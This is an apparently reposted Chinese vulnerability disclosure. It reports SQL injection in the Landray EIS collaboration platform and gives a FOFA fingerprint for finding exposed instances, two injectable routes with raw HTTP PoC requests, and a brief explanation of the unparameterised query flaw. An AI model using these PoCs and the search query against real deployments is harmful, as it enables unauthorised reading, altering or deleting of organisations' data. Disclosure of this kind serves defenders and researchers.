请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责。
蓝凌EIS智慧协助平台存在多处SQL注入。
蓝凌eis智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。
7.1.1.4—8.5.1.4
app="Landray-EIS智慧协同平台"
路由1:
http://127.0.0.1:80/mobileapp/address/mobileposition.aspx?search=*
POC:
GET mobileapp/address/mobileposition.aspx?search=* HTTP/1.1
Host: 127.0.0.1:80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
路由2:
http://127.0.0.1:80/mobileapp/Task/task_view.aspx?id=%27=
GET mobileapp/Task/task_view.aspx?id=%27= HTTP/1.1
Host: 127.0.0.1:80
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
漏洞点1:
SQL注入的风险主要集中在直接将用户输入(通过Request.QueryString获取)拼接到SQL查询语句中,没有进行预处理或使用参数化查询。
漏洞点2:
在于从Request.QueryString["id"]直接获取的id值被用于构建SQL查询语句而未进行任何过滤或参数化处理这意味着,如果攻击者通过修改URL中的id参数值为恶意的SQL代码片段,他们可能能够执行未授权的数据库操作,如访问、修改或删除数据。
原文始发于微信公众号(jacky安全):【未公开漏洞】蓝凌EIS存在多处SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论